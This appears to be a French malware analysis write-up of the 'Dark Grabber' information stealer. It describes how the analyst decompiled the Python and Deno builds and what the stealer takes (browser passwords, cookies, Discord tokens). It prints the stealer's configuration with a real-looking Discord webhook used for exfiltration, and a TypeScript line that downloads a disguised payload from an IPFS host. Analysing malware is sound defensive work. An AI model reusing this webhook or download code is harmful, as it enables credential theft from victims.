2.5 KiB
Executable File
Dark Grabber
Il existe deux versions du stealer, une appelée "Debug" et une "Normale".
Les deux sont dans le même .zip et les admins demandent de les lancer les deux.
insérer une capture
Version Normale
Elle est appelée "Install Dark Grabber.bin".
Virustotal
C'est du Python 3.10 compilé avec pyinstaller.
On peut utiliser pyinstxtractor avec pycdc pour retrouver la source.
On extrait les fichiers :
- antidebug.py
- browsers.py
- config.py
- discordtoken.py
- injection.py
- 'Install Dark Grabber'.py
- startup.py
- systeminfo.py
C'est un grabber python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord.
La config :
__CONFIG__ = {
'webhook': 'https://discordapp.com/api/webhooks/1050142994168303628/lSVmYxnWxQ8K0VWpnbteH_ThH9-w6BaI765XntsihgtkSQOzXF2fuL5WRfEZaSGHh9Tp',
'antidebug': True,
'browsers': True,
'discordtoken': True,
'injection': True,
'startup': True,
'systeminfo': True }
Version Debug
Le fichier est appelé "Install Debug Dark Grabber", le nom original est "deno.exe".
Virustotal
C'est du typescript compilé avec deno, il n'existe pas d'extracteur pour deno mais il stocke le code en clair dans l'exe. On peut le dump avec un éditeur hexadécimal comme HxD.
On extrait le code ci dessous dans main.ts :
import { download, Destination } from "https://deno.land/x/download/mod.ts";
await download("https://bafybeid7gnnacqshr64a6rpn6wevtexbw7kpiv2ckkrcdtnnmdtvd35j2e.ipfs.nftstorage.link/ikiyq", destination);
Ce code va télécharger ikiyq.exe et l'enregistrer sur le disque à C:/Users/${username}/ sous le nom Microsoft-Defender-Checker.exe.
Microsoft-Defender-Checker.exe est une dropper avec quelques decoys, il va drop ikiyq.exe qui est le stage final.
Virustotal de ikiyq.exe
Pour finir, ikiyq.exe est du Python compilé avec Nuitka.